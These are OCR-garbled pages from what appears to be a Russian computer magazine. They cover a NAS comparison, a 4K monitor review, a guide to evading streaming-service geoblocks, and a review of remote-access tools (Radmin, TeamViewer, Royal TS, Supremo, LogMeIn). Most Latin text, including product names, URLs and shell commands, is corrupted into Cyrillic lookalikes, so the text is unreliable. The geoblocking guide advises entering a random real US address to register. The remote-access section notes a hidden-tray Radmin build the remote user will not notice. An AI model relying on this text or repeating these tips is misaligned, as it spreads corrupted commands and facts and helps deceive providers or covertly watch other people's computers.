ІШеІАІот 02700, 2,13 ГГц 
ООВЗ, 2 Гб 

2 х ВѵМ5 (10/100/1000 Мбит/с), 2 х ИЗВ 3.0, 

2 х ИЗВ 2.0, 1 х е 5АТА, 1 х ѴСА, 1 х НОМІ, 

1 х Ыпе оиі 

РАЮ 0/1/5/6/10, ЗВОО 

5МВ/СІР5, НТТР/НТТР5, РТР, ТРТР, ИР5, АРР, 

І5С5І, Вопіоиг, ІІРпР 

іТипез, фотосервер, медиасервер, принт-сервер, 
сервер видеонаблюдения, почтовый сервер, 
еМиІе 
без дисков 




СПИСОК 

ТЕСТИРУЕМОГО 

ОБОРУДОВАНИЯ 

• А51І5ТОВ А5-604Т 

• Виііаіо Ііпк51а1іоп Оиасі 

• МЕТСЕАР РМ04000-200ЕІІ5 

• ОИАР Т5-469 Рго 

• 5упоІоду Оізк51а1іоп 05413] 

• ТЬесиз М4800Есо 




ХОРОШЕЕ Ш’ТРОЕНИЕ 



На примере сегодняшнего сравнительного 
теста хорошо видно, что топовые процессоры 
Іпіеі Аіопл способны прокачать гигабитную сеть 
по максимуму. Также «атомные камни» заметно 
опережают свои аналоги от МагѵеІІ. Но и стоят 
они дороже. Все-таки топовые решения будут 
гармонично смотреться в каком-нибудь офи- 



се. А для дома хватит такого хранилища, как 
Зупоіоду ОізкЗіаІііоп 03413І. За свои возмож- 
ности и небольшую цену данный девайс полу- 
чает награду «Лучшая покупка». Если же идти 
на компромиссы — не твой стиль, то присмо- 
трись к Ні-Епб-серверам от ОМАР, А51І5ТОВ 
и ТНесиз. НЕ 







ХАРАКТЕРИСТИКИ 

Диагональ: 31,5" 
Соотношение сторон: 16:9 
Разрешение: 3840 * 2160 
Контрастность: 800:1 
Яркость: 350 кд/м 2 
Время отклика: 8 мс 
Колонки: 2 х 2 Вт 
Разъемы: ОізрІауРогІ / В5- 
2320/3,5 мм МіпЫаск 
Размеры: 750 * 489 * 256 мм 



Е ще недавно мы рассказывали о роутерах с под- 
держкой 802. 11 ас, о том, что уже сейчас есть 
смысл инвестировать в будущее своей домаш- 
ней сети. С 4К-мониторами ситуация немного 
сложнее, если смотреть глазами домашнего 
пользователя. Кино в 4К найти почти невозможно, а чтобы 
играть на таком разрешении, понадобится ультрамощная 
машина с несколькими видеокартами. Однако у профес- 
сионалов, работающих с графикой, есть хорошие причи- 
ны присматриваться к 4К уже сейчас. Точнее сказать, 8,3 
миллиона причин. 

Преимущество 4К не только в более высокой четко- 
сти, но и в большем количестве экранного пространства. 
Конечно, для серьезной работы все равно понадобится 
неслабое железо — производитель рекомендует дискрет- 
ные АМР не младше 7000-й серии или ІМѴЮІА СТХхотя бы 
из 600-й линейки, поддерживающие вывод в 4К на уров- 
не драйверов. Также нужно учитывать, что в европейской 
версии (имеющей суффикс Е в названии) отсутствует порт 
НЮМІ, поэтому карточка должна иметь вывод ОізрІауРоП. 
Также пользователям ѴѴіпсІоѵѵз нужно дождаться выхода 
версии 8.1, в которой заявлена поддержка высоких раз- 
решений. 

В А51І5 отдельно гордятся тонкостью своего монитора. 
Толщина 31,5-дюймового дисплея не превышает 35 мм. 



Платформа монитора позволяет регулировать высоту 
(экран можно поднять максимум на 15 см), наклон (на 30 
градусов) и поворот (на 45 градусов в каждую сторону). 
На задней панели монитора предусмотрен аудиовход 
и разъем для наушников. В мониторе также разместились 
колонки с мощностью в 2 Вт. Встроенного ІІ8В-хаба, увы, 
не предусмотрено. Также монитор имеет ѴЕЗА-крепление, 
позволяющее повесить его на стену. 

Отдельно стоит отметить матрицу монитора, изготов- 
ленную по технологии ІС20, что дает более низкое энер- 
гопотребление. Кроме того, монитор может похвастаться 
хорошими углами обзора — под углом в 45 градусов по ди- 
агонали заметного искажения картинки не возникало. 

Как и стоило ожидать, 4К-экран дает исключительно 
четкую картинку, но АЗІІЗ можно также похвалить за хоро- 
шую яркость на уровне в 350 кандел на квадратный метр 
и контрастность на уровне 800: 1 . 

ВЫВОДЫ 

Нельзя не отметить, что Р032ЮЕ — дорогая игрушка. 
Но для профессионалов и экстремальных геймеров до- 
вольно оправданная. В продаже новинка появится в сен- 
тябре. Стоит дождаться, когда на уровне приложений 
и ОС появится поддержка 4К и станет возможным находить 
видеоконтент в таком высоком разрешении. 3-С 






Обходим геоблокировку контент- 
сервисов на любых устройствах 

ЫеІТІіх, Ниіи, Рапсіога, ЗроШу... Ты наверняка не раз натыкался 
на эти названия. Магические сервисы, дающие за 8-10 долларов 
столько контента, сколько в тебя влезет. Давай посмотрим, как 
получить доступ к ним с любого устройства. 



К ак можно догадаться из объема этой 
статьи, использование таких сервисов 
в России — не самое простое занятие. 
Поэтому перед тем, как обречь себя 
на весь этот геморрой, неплохо бы понимать, за- 
чем это делать. 

Проще всего объяснить необходимость 
в ЗроШУ и Рапсіога — у этих сервисов есть отлич- 
ные рекомендации музыки любого жанра. Условно 
говоря, если я включаю радио в «Яндекс. Музыке», 
то почти для любого жанра 7 из 10 треков будут 
с альбома, в продвижении которого Яндекс в дан- 
ный момент заинтересован больше всего. Вклю- 
чил блюз — получай Хью Лори, включил рок — слу- 
шай «Океан Эльзи». С Рапсіога мне почти каждый 
раз удавалось находить для себя что-то новое. 



В случае с Ниіи и ІМеШх все сложнее. Наивно 
ожидать, что на этих сервисах есть любой фильм 
или сериал, который тебе только придет в голо- 
ву. Этим не могут похвастаться даже сервисы 
оп бетапсі, где за каждую запись нужно платить 
по отдельности. Профит ЫеШх в другом. На- 
верняка ты не раз оказывался в ситуации, когда 
компания сидит перед телевизором и полчаса 
тупит, решая, что же посмотреть. Этим достаточ- 
но унылым делом часто приходится заниматься 
и самому. В общем, свобода выбора не всегда 
благо, иногда хочется просто прокрутить меню, 
выбрать что-то из списка, кликнуть и тут же на- 
чать смотреть. 

Конечно, тут возникает еще одно препят- 
ствие — весь контент на английском. Однако 



сам я предпочитаю смотреть кино и сериа- 
лы в оригинале и уверен, что я такой далеко 
не один. Ниіи дает возможность еще и попро- 
бовать американское телевидение, совсем не- 
похожее на наш зомбоящик. Ток-шоу с Кона- 
ном О’Брайном и другие Іаіе підТіІ; зііоѵѵ, скетчи 
Заішсіау ІМідІіІ: Ыѵе и даже Атегіса’з Соі Таіепі, 
выгодно отличающееся от наших аналогов мас- 
штабностью, эффектностью номеров и поч- 
ти полным отсутствием фриков. Все это даже 
в торрентах не найти. 

Хотя каждый наверняка хоть раз слышал 
об этих сервисах, имеет смысл рассказать под- 
робно, чтобы ты понимал, на каком контенте 
специализируется каждый из них и в чем особен- 
ность их работы. 




рсгоыЕ 
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ВИДЕО 



ЫеНІіх 

Когда-то ЫеШх занимался прокатом 0\Ю, но успел вовремя трансформиро- 
вать свой бизнес. Сейчас в США ему принадлежит до 90% рынка видеосер- 
висов, работающих по подписке. Причина в огромном каталоге. Минус в том, 
что тут редко появляются совсем свежие серии. Выбор фильмов тоже нема- 
ленький, но сюда попадают в основном старые картины. Лучше, чем у какого- 
нибудь Іѵі.ги, но все равно не сравнится с любым оп бетапсі сервисом вроде 
іТипез или Ата 20 п Іпзіапі: Ѵібео. 




Ниіи 

Еще один популярный видеосервис, занимающий оставшиеся десять про- 
центов рынка. В Ниіи сделали фокус на свежих сериях, и часто так получает- 
ся, что последний сезон какого-либо сериала или шоу доступен только здесь, 
а весь остальной архив — на ЫеШх. Поэтому многим логично использовать 
эти два сервиса в связке. Недостаток в том, что большая часть контента в Ниіи 
доступна только в браузерной версии и даже подписчики не имеют возмож- 
ности посмотреть его на мобильном устройстве или ТВ-приставке. Также тут 
есть реклама — и для подписчиков тоже. 




УОУ ѴѴАТСН 



Видеосервисов меньше, чем музыкальных, но и тут дело не ограничивается двумя названиями. Есть еще набирающий популярность Атагоп Ргіте, 
но он совместим с меньшим количеством устройств и требует годовой подписки. Профит скорее для тех, кто часто что-то покупает на Атагоп, так 
как вместе с подпиской на Ргіте даются льготные условия доставки товаров. 



МУЗЫКА 



Рапсіога 

Один из первых сервисов, предложивших автоматическую генерацию под- 
борки музыки для пользователей. Поскольку Рапсіога начинал еще до бума 
социальных сетей, разработчики сделали ставку на очень продвинутый ал- 
горитм, способный выстраивать «родственные» связи между песнями и ис- 
полнителями по сотням параметров. На мой вкус, это работает намного 
лучше, чем сервисы, использующие для рекомендаций социальный граф. 
Минусы в том, что нельзя выбрать конкретную песню и нельзя пропускать 
больше определенного количества треков. Плюс в том, что Рапсіога бесплатна 
как в браузере, так и на устройствах. 




5роііТу 

Рапсіога — отличный инструмент для того, чтобы находить новую музыку. 
Сильная сторона ЗроИТу — в том, как он позволяет слушать ту музыку, кото- 
рую ты уже знаешь и любишь. В этом смысле здесь мало ограничений, и ауди- 
отека сервиса почти в 20 раз больше, чем у главного конкурента. Также если 
у Рапсіога социальной составляющей почти нет, то в ЗроііТу это одна из глав- 
ных фишек. Еще у сервиса есть очень неплохие приложения для десктопа 
и мобильных устройств. Подписчики (10 долларов в месяц) могут составлять 
плей-листы и скачивать их на смартфон для офлайн-прослушивания. 




Музыкальных сервисов намного больше — еще есть Ксііо, Соодіе РІау Мизіс, а скоро появится и ІТипез Васііо. Кроме того, есть и сервисы, прекрас- 
но работающие в России (например, 2ѵоод, Оеегег). Рапсіога в данном случае интересна действительно хорошим алгоритмом составления плей- 
листов — она часто подбирает неочевидные треки. 
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ТЕСТ В БРАУЗЕРЕ 

Шаг первый — попробовать все это дело в браузере. Это про- 
ще всего и не требует никаких финансовых вложений, а ты уже 
сможешь понять, нужно ли это тебе. 

Самый простой способ — поставить расширение Месііа Ніпі: 
( ШозѴ/тебіаЬіпі.сот ) для браузера. Поддерживаются Ріге^ох 
и СЬготе. Для пользователей других браузеров есть отдельный 
рас-файл ( тебіаМпі.сот/беіаиІі.рас ). который прописывается 
в системных настройках или в браузере. После установки снова 
зайди на тесПаЫпЬсот для того, чтобы убедиться, что все ра- 
ботает так, как нужно. 

ЫЕТРЫХ В КАРМАНЕ 

Для того чтобы попробовать поставить все это дело на мобиль- 
ные устройства, придется потрудиться. Естественно, на клиен- 
ты всех сервисов наложены географические ограничения. Про- 
ще всего в АпсІгоісІ — достаточно воспользоваться ѴРЫ и зайти 
в Соодіе РІау. Самый простой вариант — ТиппеІВеаг ( іиппеІЬеаг. 
сот ). В ЮЗ все сложнее — нужно создать американскую учетку, 
и, чтобы сделать это без привязки к американской банковской 
карточке, придется пойти на хитрость. 

Открой десктопный іТипез и зайди в раздел приложений. 
Выйди из своей учетки и найди любое приложение, требующее 
американской учетки. При попытке установить его тебя пере- 
ключит на американский Арр Зіоге, после чего ты сможешь за- 
вести новую учетку, не имеющую привязки к банковской карте. 
Дальше тебе нужно зайти в ІТипез на своем устройстве и уста- 
новить все нужные приложения. После этого можешь зайти 
обратно в свой обычный аккаунт. Каждый раз, когда будут вы- 
ходить обновления для установленных «в обход» приложений, 
тебе просто будут предлагать ввести пароль для соответствую- 
щей учетки, так что никакого дополнительного геморроя. 

Однако для того, чтобы приложения заработали, придет- 
ся еще помучиться. Тут есть два варианта — либо воспользо- 
ваться ѴРЫ с американским ІР, либо подключить специальный 
ЭІ\І8-сервис. Вариант с ЭЫ8 лучше в том смысле, что нет ника- 
ких ограничений по трафику. Минус в том, что его нужно про- 
писывать отдельно для каждой ѴѴі-Рі-сети, а в мобильной сети 
этот трюк вообще не сработает. ѴРЫ-сервисы вроде ТиппеІВеаг, 
Нісіетап ( Ьібетап.пеЬ и ЗроШих ( зооНІих.сот ) намного проще 
в использовании, но стоят денег. Но поскольку основной юзкейс 
тут — просмотр сериалов на планшете дома или в гостинице, 
логичнее выбрать ЭІ\І8. 

Я пробовал три разных ЭІМЗ-сервиса. Бесплатный Типіг 
(Шпігпеі) дает доступ к Ниіи, но не ІМеШх, а бесплатный 
ІІпІосаІог ( ШозѴ/ипІосаІюг.сот ) — наоборот. Впрочем, как 
я понимаю, у ІІпІосаІог проблема с Ниіи лишь временная, так 
что, возможно, когда ты будешь читать эту статью, все зарабо- 
тает. Лучше всех себя показал сервис ІІпоЭІМЗ, но он обойдется 
в 5 долларов в месяц (то есть как ѴРІМ). 

Итак, ты поигрался и решил, что тебе понравилось. Нужно 
платить. Тут возникает еще одна проблема — чаще всего карта 
российского банка к оплате не подойдет. Придется пойти на до- 
полнительное ухищрение и завести виртуальную карточку ОІѴѴІ 



Лучше всего 
в моем тесте 
сработал 
АррІеТѴ 





Трюке РІМ5, есте- 
ственно, не пройдет 
с мобильной сетью. Если 
хочешь слушать Рапбога 
в машине, тебе придется 
заранее запустить при- 
ложение в ѴѴі-Рі-сети 
либо использовать ѴРІМ. 



Обрати внимание, что 
настройки субтитров 
в Арріе ТѴ нужно выстав- 
лять не в приложении, 
адля самой приставки. 

Иначе при каждом 
запуске фильма в №Шх 
придется включать 
субтитры вручную. 




ТиппеІВеаг — ну очень 
милый ѴРЫ 



При желании можно 
настроить РМ5 прямо 
на роутере -тогда не 
придется заниматься 
отдельной настройкой 
каждого устройства. 
Но такое явно не каждо- 
му понравится. 



На самом деле основной 
юзкейедля Ниіи и ИеННх 
на мобильном устрой- 
стве -возможность с 
удобством изучать ката- 
лог и составлять список 
для просмотра, который 
тутже синхронизируется 
с твоей учеткой . Также 
есть целый класс при- 
ложений, предоставля- 
ющихуниверсальный 
поиск по всем сервисам. 
Например, Рап ( іап.іѵ ) 
для І05, Раѵѵе Паѵѵе. 
сот ) для ЮЗ и АпсІгоісІ. 




Гауѵе — удобный каталог, позволяющий искать сериалы и фильмы 
сразу по всем площадкам 



( Шр5://ѵіза.діѵѵі.сот ). После регистрации ты сможешь попол- 
нить счет со своей основной карты. Для регистрации в сервисах 
вводи данные, предоставленные ОІѴѴІ, а также любой реальный 
американский адрес. Это легко найти в Соодіе Марз, можешь 
просто выбрать случайный Арріе 81:оге. 

БОЛЬШОЙ ЭКРАН 

Наконец, ты, вероятно, захочешь вывести картинку на теле- 
визор. Конечно, можно развернуть обычный НТРС и пользо- 
ваться браузерными версиями, но удобства в этом мало (как 
минимум — нельзя пользоваться пультом). Самое подходящее 
устройство, которое можно найти в России, — это Арріе ТѴ. Сто- 
ит около 4500 рублей, совместимо с Ниіи и ІМеШх. А главное — 
приставка позволяет выставлять произвольные ЭЫ8, что важно 
для наших целей. 

Процедура довольно стандартна. Сначала нужно выбрать 
ЭІМ8-сервис (смотри выше). Затем ввести его данные в Арріе 
ТѴ. Единственное «но» — придется выйти из своего Арріе Ю. 
Лично у меня не удавалось войти даже под американской учет- 
кой. Следовательно, не будет работать Ноте 8Ьагіпд из других 
Арріе-устройств и нельзя будет использовать іРЬопе в качестве 
пульта. 

Если есть возможность, можешь купить в Штатах пристав- 
ку Роки. Поддерживает все известные сервисы и имеет очень 
удобную функцию универсального поиска по всем контент-про- 
вайдерам, но, увы, ЭІМ8 в ней не выставить. Придется пропи- 
сывать прямо в роутере, а это не всем подходит. Также обрати 
внимание, что английские версии Роки отличаются прошивкой 
и с американскими сервисами несовместимы. Еще одна «все- 
ядная» альтернатива — Соодіе ТѴ, который тоже придется вво- 
зить из Штатов. 

Ниіи и ІМеШх совместимы с ХЬох 360 и РІауВІабоп 3. Я тести- 
ровал все это дело на Х360. Консоль определяет местоположе- 
ние пользователя как по ІР, так и по адресу, указанному в ин- 
формации о карте. Поэтому, если у тебя привязана к аккаунту 
карта, придется немного схитрить: 

1 . Введи в настройки консоли данные ЭІМ8. 

2. Создай новую учетную запись. 

3. Войди в нее и зайди в раздел приложений. 

4. Поставь Ниіи и ЫеШх. 

5. Вернись в свою учетную запись, зайди в приложения и вве- 
ди данные учетных записей. 

Вот и все. В моем случае, правда, ЫеШх жаловался на низ- 
кую скорость и занижал разрешение так, что на экране станови- 
лись заметны артефакты. Кроме того, для ХЬох 360 потребует- 
ся платный аккаунт ХЬох І_іѵе СоІсІ (около 240 рублей в месяц), 
но у пользователей Р83 таких проблем нет. 

Мой опыт я считаю удачным. Я остановился на бесплатной 
Рапбога и подписке на ЫеШх, получив таким образом доступ 
к очень неплохой коллекции контента в НО по цене базового 
пакета каналов у какого-нибудь «Билайна» (или любого другого 
провайдера). ЭС 






РС ДОЛГЕ 
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КАК ПРАВИЛЬНО 
ПОДСТУПИТЬСЯ 



Средства удаленного 
доступа на все случаи жизни 
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Денис Колисниченко 



Программ для организации удаленного доступа достаточно много. Есть платные и бесплатные 
программы, есть программы для разных операционных систем. Разумеется, в этой статье мы 
не сможем рассмотреть все сразу, но поговорим о самых интересных из них, а главное — пой- 
мем, что эффективнее для той или иной задачи. 



ВЛОММ (ЗНАРЕѴѴАВЕ) 

Лет десять назад самой популярной программой 
для удаленного доступа была Вабтіп, она и сей- 
час есть ( ѵѵѵѵѵѵ.гасітіп.ги ) — никуда не подева- 
лась за это время. С нее и начнем обзор. 

Программа состоит из двух частей: Зегѵег 
и Ѵіеѵѵег. Первая запускается на удаленном 
компьютере (или удаленных компьютерах), 
а вторая — на твоем компьютере и использу- 
ется для подключения к удаленным машинам, 
которые ты собираешься настраивать. На сайте 
разработчиков можно скачать как полный ком- 
плект, так и отдельные компоненты. Также есть 
рогіаЫе-версия Ѵіеѵѵег, работающая без уста- 
новки, и версия Васіпліп Зегѵег 3.5 N11 — это спе- 
циальная версия без пиктограммы в трее, то есть 
пользователь удаленного компа и не узнает, 
что на нем установлена Насіпліп, пока ты не нач- 
нешь управлять его компьютером. 

Отмечу ключевые возможности: поддержка 
ѴѴіпсІоѵѵз 8 32/64 Ьі±, поддержка переключения 




сессий пользователей в ѴѴіпсІоѵѵз X Р /Ѵі з!:а /7 /8 , 
совместимость с ѴѴіпе (Насітіп может органи- 
зовать удаленный доступ к ПК под управлением 
І_іпих через ѴѴіпе), поддержка Теіпеі:, удаленное 
выключение ПК, сканер серверов Насіпліп (по- 
зволяет найти все ПК, которыми ты можешь 
управлять в своей сети), передача файлов между 
Зегѵег и Ѵіеѵѵег. 

Выводы: 

+ Функционал программы: здесь и собствен- 
ная аутентификация, и поддержка голосо- 
вого чата, и возможность передачи файлов. 
Все очень удобно. 

+ Благодаря тому что на удаленном компе 
установлен Зегѵег, не нужно присутствие 
пользователя, как в других подобных про- 
граммах. Например, ты можешь админи- 
стрировать удаленные ПК своих коллег, 
когда те ушли на обед. В других подобных 
программах необходимо или чтобы пользо- 




^1 Кэгітіп Ѵіеѵѵег 

Соединение Режим Вид Сервис Справка 



ватель разрешил соединение, или же чтобы 
пользователь предоставил тебе пароль, ко- 
торый генерируется автоматически при каж- 
дом сеансе связи. 

+ Низкие системные требования, программа 
совсем не грузит процессор, что особо ак- 
туально для моего старого ноута с процем 
от АІѴЮ, который греется как утюг, — он и вы- 
ступал в роли «удаленного» компа. 

- Просто запустить Зегѵег недостаточно, нуж- 
но его еще и настраивать. 

- Многие пользователи любят ТеатѴіеѵѵег 
не за его функциональность, а за то, 
что он не требует каких-либо особых пор- 
тов (по умолчанию он использует 80-й 
порт) и не требует настройки брандмауэра. 
Васіпліп Зегѵег использует порт 4899, и запу- 
стить его без настройки брандмауэра не по- 
лучится. 

- Нет мобильных клиентов. 

- Не поддерживает другие ОС. 



Рис. 3. Брандмау- 
эр заблокировал 
попытку подклю- 
чения 



Рис. 1 . Окно настройки Насітіп Зегѵег 



Рис. 2. Насітіп Ѵіеѵѵег 



ѵегЗ.ехе - безопасное пр 



следует заблокировать 
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ТЕАМѴІЕѴѴЕП (РВЕЕѴѴАВЕ) 

Сейчас, наверное, из программ для удаленного 
доступа популярнее всех ТеатѴіеѵѵег. Ты можешь 
скачать ее полную версию и при этом не запла- 
тить ни копейки. Для некоммерческого использо- 
вания программа бесплатна. 

Также есть рогІаЫе-версия программы 
для ѴѴіпсІоѵѵз, что очень полезно для нечастого 
использования программы, причем рогіаЫе- 
версию можно запускать как на «сервере», так 
и на «клиенте», в отличие от Расіпліп, где можно 
запустить только клиент (Ѵіеѵѵег) без установки, 
а «серверную» часть нужно обязательно устанав- 
ливать. 

После запуска программы ты увидишь основ- 
ное окно ТеатѴіеѵѵег и окно «Компьютеры и кон- 
такты» (рис. 4). Если ты планируешь помогать 
сразу всем своим родственникам и коллегам, 
можешь нажать кнопку «Зарегистрироваться», 
создать аккаунт, и тогда в этом окне ты будешь ви- 
деть все многочисленные компы, которые ты на- 
страивал. 

Теперь разберемся, что есть что. Если нужно 
подключиться к твоему компу, то удаленной сто- 
роне ты должен сообщить свой Ю (в данном слу- 
чае 969 930 547) и пароль (8229). Как сообщить, 
уже решай сам — можно скопировать и передать 
эти значения по скайпу, аське, по электронке, 
ЗМЗ или просто продиктовать по телефону. Этот 
пароль меняется при каждом запуске програм- 
мы. Если программа установлена на твоем ком- 
пе, можно сделать постоянный личный пароль, 
но я не рекомендую: пароль может быть ском- 
прометирован и тогда кто угодно сможет подклю- 
читься к твоему компу. 

Если нужно подключиться к удаленному ком- 
пу, то тебе нужно ввести Ю удаленной стороны 
(в данном случае 411108007) и нажать кнопку 
«Подключиться к партнеру», после чего програм- 




Рис. 4. ТеатѴіеѵѵег запущен 

ма попросит ввести пароль, который ты получил 
от удаленной стороны. Вот и все — в появившем- 
ся окне можно производить настройку удаленно- 
го компа (рис. 5). 

Наверное, ты уже заметил основное отличие 
от Васітіп: нужно передать пароль тому, кто на- 
страивает комп, а в Васітіп пароль указывается 
при создании учетки пользователя. Другими сло- 
вами, нужно присутствие пользователя за ком- 
пом. Чтобы решить проблему, нужно организо- 
вать автозапуск ТеатѴіеѵѵег (например, добавить 
в группу «Автозагрузка» или прописать в реестре 
в ключе Вип) и задать «Личный пароль». Обрати 
внимание, что задать личный пароль нельзя, если 
программа не установлена на компе, а запущена 
без установки. 

Есть еще одна программа, о которой ты дол- 
жен знать: ТеатѴіеѵѵег НозГ Она запускается 
как системная служба и используется для кру- 
глосуточного доступа к удаленному компу, вклю- 
чая вход в систему / выход из нее. Для установки 
ТеатѴіеѵѵег Нозі: нужны права администратора, 
которые не всегда есть, поэтому все равно в боль- 
шинстве случаев будешь пользоваться обычным 
ТеатѴіеѵѵег. 




Рис. 5. ТеатѴіеѵѵег в действии 

Если на компьютере А запущен ТеатѴіеѵѵег (не 
Нозі:), то к нему могут подключиться компы Б, В, Г 
(число три приведено для примера) для совмест- 
ного администрирования. Другое дело, что нужно 
согласовывать действия администраторов, по- 
скольку клавиатура и мышь общие, но один может 
настраивать, остальные будут наблюдать. 

Как и Васітіп, ТеатѴіеѵѵег позволяет обме- 
ниваться файлами, голосовыми и текстовыми 
сообщениями, а также удаленно перезагружать 
компьютер. 

Выводы: 

+ Простота. 

+ Не требует установки. 

+ Не требует настройки брандмауэра. 

+ Наличие версий для других ОС. 

+ Наличие клиентов для АпсІгоісІ, І08 и ѴѴР8 
+ Возможность организации интерактивных 
конференций (до 25 участников). 

+ Не требует прав администратора для уда- 
ленного доступа. 

- Грузит процессор заметно больше, чем 
Васітіп. 

- Мобильные клиенты не очень удобны. 



КОѴАЬТЗ (ЗНАВЕѴѴАВЕ) 

Когда-то была такая программулина — тВетоІв. 
Не знаю, что там произошло, но проект тВетоіе 
был закрыт, а разработчики взяли и создали 
другой проект — ВоуаІ ТЗ ( ѵѵѵѵѵѵ.гоѵаііз.сот/ 
таіп/Ііоте.азрх ). На сайте ты найдешь вер- 
сии для ѴѴіпсІоѵѵз, ОЗ X и ЮЗ (можно запускать 
с іРИопе и іРасІ). 

В ВоуаІ ТЗ перед созданием подключения 
нужно создать документ, то есть одно подключе- 
ние = один документ. Документы ВоуаІ ТЗ весьма 
удобная штука, их можно передавать как обычные 
файлы, например другому админу. Он сможет от- 
крыть такой документ и сразу подключиться к уда- 
ленному компу без необходимости создавать 
соединение вручную. У зііагеѵѵаге-версии есть 
ограничение на число одновременно открытых 
документов — десять. Как по мне, то этого вполне 
достаточно для некоммерческого использования 
программы, поэтому на практике ты даже не за- 
метишь, что тебе чего-то не хватает (если, конеч- 
но, ты не администрируешь удаленно огромную 
сеть компов). 

Программа кардинально отличается 
от Васітіп и ТеатѴіеѵѵег. Обе программы соче- 
тают в себе функциональность как сервера, так 
и клиента. Другими словами, на одном из ком- 
пьютеров ты можешь установить Васітіп Зегѵег 
или ТеатѴіеѵѵег, а на другом использовать Васітіп 
Ѵіеѵѵег или ТеатѴіеѵѵег соответственно для под- 
ключения к этому удаленному компу. Так вот, ВоуаІ 
ТЗ — это что-то наподобие Васітіп Ѵіеѵѵег, то есть 
программа для подключения к удаленному сер- 
веру, но вот сервер придется создавать своими 



силами. Как ты это сделаешь — твои проблемы. 
ВоуаІ ТЗ не поможет тебе создать такой сервер, 
а только даст подключиться к нему. 

ВоуаІ ТЗ поддерживает протоколы ВЭР, Теіпеі, 
83Н, СИтіх, ѴІМС. Серверы придется настраивать 
самостоятельно. Пусть у нас есть І_іпих (ІІЬипШ 
или ее клон) и нужно настроить ѴІМС-сервер. 
Для этого сначала установим ѴІМС-сервер: 

зисіо ар~Е-§е1: іпзііаіі ѵпс4зегѵег 

Первый раз запускаем без параметров: 

зисіо ѵпс4зегѵег 



Нужно ввести пароль, который будет исполь- 
зоваться для подключения к серверу. Сам пароль 
будет сохранен в $НОМЕ/.ѵпс/раззѵѵсІ. Теперь 
нужно запустить ѵпс4зегѵег, указав номер экрана: 

зисіо ѵпс4зегѵег :3 



Далее в ВоуаІ ТЗ нужно создать новый доку- 
мент (на вкладке РМе), далее перейти на вкладку 
Есііѣ и нажать кнопку ѴЫС. В появившемся окне 
нужно ввести имя дисплея (Эізріау Мате) — в на- 
шем случае :3, ІР-адрес ѴЫС-сервера и указать 
номер порта (обычно 5900). Пароль будет запро- 
шен при подключении к серверу. 

Выводы: 

+ Универсальный клиент для подключения 
по различным протоколам. 

+ Есть версии для ѴѴіпсІоѵѵз, ОЗ X и ЮЗ. 



- Невозможно организовать удаленный до- 
ступ только средствами ВоуаІ ТЗ, нужны до- 
полнительные программы. 

- Требует дополнительной настройки серверов. 







Рис. 6. ВоуаІ Т5 для ѴѴіпсІоѵѵз 




Рис. 7. Параметры подключения кѴЫС 
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51ІРПЕМО (РПЕЕѴѴАРЕ) 

Давай проанализируем ситуацию. Если тебе 
не нравится ТеатѴіеѵѵег или ты не можешь его 
использовать по некоторым причинам (в том 
числе и из-за необходимости покупать лицензию 
для коммерческого использования), а Расітіп 
тоже не подходит по каким-либо причинам, 
то придется искать аналоги. 

Одним из аналогов является программа 
Зиргепло, которую можно скачать с сайта ѵѵѵѵѵѵ. 
зиогетоітее.сот/іпсіех.азрх . 

Программа (рис. 8) создана «по образу и по- 
добию» ТеатѴіеѵѵег. Она не требует установки, 
принцип работы как у ТеатѴіеѵѵег, даже терми- 
нологию она использует ту же (это я про Ю пар- 
тнера и другие надписи в интерфейсе). 

Настраиваемый компьютер и компьютер 
специалиста поддержки должны работать под 




управлением только ѴѴіпсІоѵѵз. Поддерживаются 
разные выпуски ѴѴіпсІоѵѵз, в том числе ѴѴіпсІоѵѵз 7 
и ѴѴіпсІоѵѵз Зегѵег 2008 В2. О поддержке ѴѴіпсІоѵѵз 
8 и ѴѴіпсІоѵѵз Зегѵег 2012 на официальном сайте 
пока ничего не сказано. 

Алгоритм использования прост: нужно запу- 
стить программу на обоих компьютерах, затем 
запросить у удаленной стороны ее Ю и пароль, 
после чего нажать «Соединиться». Перед этим 
удаленная сторона должна нажать «Старт», ина- 
че соединение не будет разрешено. Пожалуй, 
это единственное отличие от ТеатѴіеѵѵег. 

Чтобы обзор был более полным, зайдем в на- 
стройки программы (Инструменты — ► Опции). 
В разделе «Безопасность» (рис. 9) можно на- 
строить автозапуск программы, указать пароль 
для удаленных подключений и указать, какие Ю 
могут подключаться к твоему компу. 




В разделе «Соединение» (рис. 10) можно ука- 
зать параметры прокси-сервера, если он при- 
сутствует в твоей сети. 

Кроме своего прямого назначения, а именно 
удаленного управления компьютером, програм- 
ма может использоваться для обмена файлами. 
Для обмена файлами (который возможен в двух 
направлениях — как скачивание, так и закачка) 
просто используй бгад & бгор. 

Выводы: 

+ Проста в использовании, не требует установки. 
+ Возможность передачи файлов. 

+ Возможность чата. 

+ Не требует настройки брандмауэра (исполь- 
зуется НТТРЗ/55І-). 

- Нет поддержки других ОС, кроме ѴѴіпсІоѵѵз. 

- Нет мобильных клиентов. 




Опции 




Настройки прокси 
@ Нет прокси 

© Автоматически определить настройки прокси 
© Ввести настройки вручную 

Адрес Порт 



Имя пользователя 
Пароль 



| ОК | | Отмена | Применить | 



Рис. 8. Программа Зиргепло 



Рис. 9. Параметры безопасности Зиргепло 



Рис. 10. Параметры соединения Зиргепло 






ЮСМЕШ(РПЕЕѴѴАПЕ) 

Рассмотрим еще одну полезную программу — 
І_одМеІп (рис. 11). Назначение этой программы 
такое же, как и у всех остальных, рассмотрен- 
ных в этой статье, — удаленный доступ. На сай- 
те Іоатеіп.сот ты найдешь несколько подобных 
продуктов, нас же в первую очередь интересует 
продукт І_одМеІп Ргее. Ее возможностей впол- 
не достаточно для большинства целей: доступ 
к компу под управлением ѴѴіпсІоѵѵз или 05 X, уда- 
ленное управление и просмотр рабочего стола, 
копирование и вставка данных между компью- 
терами, функция перезагрузки, чат, поддержка 
нескольких мониторов, обнаружение вторжения 
по протоколу 55І_ДІ_5, не требует настройки па- 
раметров брандмауэра, не требует прав админи- 
стратора удаленного компа. 

Лично мне понравились функции копирования 
и вставки данных между компьютерами, а также 
функция перезагрузки: в процессе настройки 
компьютера иногда требуется его перезагрузка, 



после которой будет автоматически восстановлен 
сеанс удаленного доступа, что очень удобно. 

Способ работы с этой программой немного 
отличается от ТеатѴіеѵѵег и подобных программ. 
В основном окне выбери «с Мае или ПК» и затем 
увидишь последовательность действий, кото- 
рую нужно выполнить, чтобы предоставить дру- 
гому пользователю доступ к этому компу (рис. 
12). Без регистрации на Іодтеіп.сот не обой- 
тись, она хоть и бесплатная, но совершенно 
лишняя. 

Есть, правда, способ проще — анонимный 
